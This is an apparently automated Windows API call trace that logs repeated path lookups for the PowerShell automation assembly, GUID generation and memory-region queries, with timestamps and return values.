	[0146.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.200] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x96f4984c, Data2=0xf62b, Data3=0x40fc, Data4=([0]=0x8e, [1]=0x0, [2]=0xc7, [3]=0x23, [4]=0xaa, [5]=0x84, [6]=0x2d, [7]=0xc4))) returned 0x0
	[0146.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.200] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.201] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xd60a367d, Data2=0x5347, Data3=0x42e2, Data4=([0]=0x96, [1]=0x6d, [2]=0x8d, [3]=0x54, [4]=0xb3, [5]=0xdf, [6]=0x7b, [7]=0x6d))) returned 0x0
	[0146.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.201] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.202] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x7332880a, Data2=0x26d7, Data3=0x48f6, Data4=([0]=0x9b, [1]=0xb8, [2]=0x24, [3]=0xb8, [4]=0x77, [5]=0xe0, [6]=0x79, [7]=0x70))) returned 0x0
	[0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.202] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.203] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x4bc9d751, Data2=0x9a40, Data3=0x414d, Data4=([0]=0xb3, [1]=0xde, [2]=0xfa, [3]=0xbc, [4]=0x5f, [5]=0x68, [6]=0x97, [7]=0xc7))) returned 0x0
	[0146.203] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x201be1f6, Data2=0x2085, Data3=0x49a3, Data4=([0]=0xa1, [1]=0x89, [2]=0xf5, [3]=0x84, [4]=0x1a, [5]=0x1c, [6]=0x7b, [7]=0x58))) returned 0x0
	[0146.204] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xd5834428, Data2=0x42c4, Data3=0x4bc6, Data4=([0]=0xb7, [1]=0xbe, [2]=0xf, [3]=0xf7, [4]=0x9c, [5]=0x49, [6]=0x91, [7]=0xbf))) returned 0x0
	[0146.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc550, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cc4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.205] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xb432ba7, Data2=0xaf14, Data3=0x41de, Data4=([0]=0x9e, [1]=0xc0, [2]=0x57, [3]=0x59, [4]=0xf2, [5]=0x4e, [6]=0x81, [7]=0x72))) returned 0x0
	[0146.205] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.205] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.206] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.206] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.206] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.206] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.207] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cb640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cbab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.207] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.208] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cba00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.208] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.208] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.208] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.208] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.209] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.209] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.209] VirtualQuery (in: lpAddress=0x1caf30, lpBuffer=0x1cbdf0, dwLength=0x30 | out: lpBuffer=0x1cbdf0*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.209] VirtualQuery (in: lpAddress=0x1cafc0, lpBuffer=0x1cbe80, dwLength=0x30 | out: lpBuffer=0x1cbe80*(BaseAddress=0x1ca000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.210] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.210] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.210] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.210] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.210] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.210] VirtualQuery (in: lpAddress=0x1cb830, lpBuffer=0x1cc6f0, dwLength=0x30 | out: lpBuffer=0x1cc6f0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.211] VirtualQuery (in: lpAddress=0x1cb8c0, lpBuffer=0x1cc780, dwLength=0x30 | out: lpBuffer=0x1cc780*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.211] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xeb30268b, Data2=0xda53, Data3=0x42de, Data4=([0]=0xac, [1]=0x7e, [2]=0xdc, [3]=0x8, [4]=0xed, [5]=0xa2, [6]=0xc7, [7]=0x7c))) returned 0x0
	[0146.211] VirtualQuery (in: lpAddress=0x1cb840, lpBuffer=0x1cc700, dwLength=0x30 | out: lpBuffer=0x1cc700*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.211] VirtualQuery (in: lpAddress=0x1cb840, lpBuffer=0x1cc700, dwLength=0x30 | out: lpBuffer=0x1cc700*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.211] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.211] VirtualQuery (in: lpAddress=0x1cb840, lpBuffer=0x1cc700, dwLength=0x30 | out: lpBuffer=0x1cc700*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.211] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.212] VirtualQuery (in: lpAddress=0x1cb840, lpBuffer=0x1cc700, dwLength=0x30 | out: lpBuffer=0x1cc700*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.212] VirtualQuery (in: lpAddress=0x1cb8d0, lpBuffer=0x1cc790, dwLength=0x30 | out: lpBuffer=0x1cc790*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
